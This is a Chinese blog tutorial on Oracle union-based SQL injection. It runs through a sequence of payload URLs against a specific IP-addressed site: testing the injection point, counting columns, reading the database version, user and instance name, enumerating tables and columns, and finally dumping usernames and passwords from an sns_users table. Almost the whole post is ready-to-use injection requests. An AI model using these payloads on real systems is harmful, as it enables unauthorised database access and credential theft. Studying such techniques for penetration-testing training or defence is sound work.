【附教学】 SQL注入获取网站权限

最新推荐文章于 2024-07-23 01:07:40 发布

吉吉说安全

最新推荐文章于 2024-07-23 01:07:40 发布

阅读量1k

点赞数 41

文章标签：安全 web安全智能路由器 python 爬虫

本文链接：https://blog.csdn.net/jijisaq/article/details/136608734

版权

0x01前言

本文旨在讲述Oracle数据库多种情况下如何进行注入获取网站权限。

0x02 判断注入点

跟其他数据库一样，检测注入点都是可以通过拼接and语句进行判断。这里通过and 1=1 和and 1=2进行判断。实战中还可以通过延时函数进行判断。

http://124.70.64.48:44929/new_list.php?id=1%20and%201=1

image.png

http://124.70.64.48:44929/new_list.php?id=1%20and%201=2

image.png

0x03 显错注入

1、判断字段数为2

与其他注入一样，这里通过order by来判断字段数。因为order by 2页面正常，order by 3页面不正常，故判断当前字段数为2。

http://124.70.64.48:44929/new_list.php?id=1%20order%20by%202

image.png

http://124.70.64.48:44929/new_list.php?id=1%20order%20by%203

image.png

2、获取显错点

联合查询这里使用了union select，oracle数据库与mysql数据库不同点在于它对于字段点数据类型敏感，也就是说我们不能直接union select 1,2,3来获取显错点了，需要在字符型字段使用字符型数据，整型字段使用整型数据才可以。如下，两个字段都为字符型，故使用union select ‘null’,‘null’。

(在有些情况下也采用union all select的形式进行联合查询。union all select与union select的不同点可以很容易理解为all表示输出所有，也就是当数据出现相同时，将所有数据都输出；union select则会将相同数据进行过滤，只输出其中一条。)

#联合查询
http://124.70.64.48:44929/new_list.php?id=-1%20union%20select%20null,null%20from%20dual
#修改null为'null'，判断字段类型均为字符型
http://124.70.64.48:44929/new_list.php?id=-1%20union%20select%20%27null%27,%27null%27%20from%20dual  #%20为空格，%27为'

image.png

3、查询数据库版本信息

http://124.70.64.48:44929/new_list.php?id=-1%20union%20select%20%27null%27,(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual

image.png

4、获取当前数据库连接用户

http://124.70.64.48:44929/new_list.php?id=-1 union select 'null',(select sys_context('userenv','current_user') from dual) from dual

http://124.70.64.48:44929/new_list.php?id=-1  union select '1',user from dual

5、查询当前数据库库名

http://124.70.64.48:44929/new_list.php?id=-1%20union%20select%20%27null%27,(select%20instance_name%20from%20V$INSTANCE)%20from%20dual

image.png

6、查询数据库表名

查询表名一般查询admin或者user表

直接查询

获取第一个表名LOGMNR_SESSION_EVOLVE$

http://124.70.64.48:44929/new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual

获取第二个表名LOGMNR_GLOBAL$

http://124.70.64.48:44929/new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual

获取第三个表名LOGMNR_GT_TAB_INCLUDE$

http://124.70.64.48:44929/new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_name not in 'LOGMNR_GLOBAL$') from dual

image.png

模糊搜索查询

获取sns_users表名

http://124.70.64.48:44929/new_list.php?id=-1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual

image.png

7、查询数据库列名

直接查询

http://124.70.64.48:44929/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1) from dual
http://124.70.64.48:44929/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME') from dual
http://124.70.64.48:44929/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME') from dual……………
http://124.70.64.48:44929/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME' and column_name not in 'PROTOCOL' and column_name not in 'SPARE1' and column_name not in 'DB_USERNAME' and column_name not in 'OID' and column_name <> 'EVENTID' and column_name <> 'NAME' and column_name <> 'TABLE_OBJNO') from dual

image.png

模糊搜索查询

http://124.70.64.48:44929/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual
http://124.70.64.48:44929/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name <> 'USER_NAME') from dual

8、查询数据库数据

获取账号密码字段内容

http://124.70.64.48:44929/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

image.png

http://124.70.64.48:44929/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'

image.png

http://124.70.64.48:44929/new_list.php?id=-1%20union%20select%20USER_NAME,USER_PWD%20from%20%22sns_users%22%20where%20rownum=1%20and%20USER_NAME%20%3C%3E%20%27zhong%27%20and%20USER_NAME%20not%20in%20%27hu%27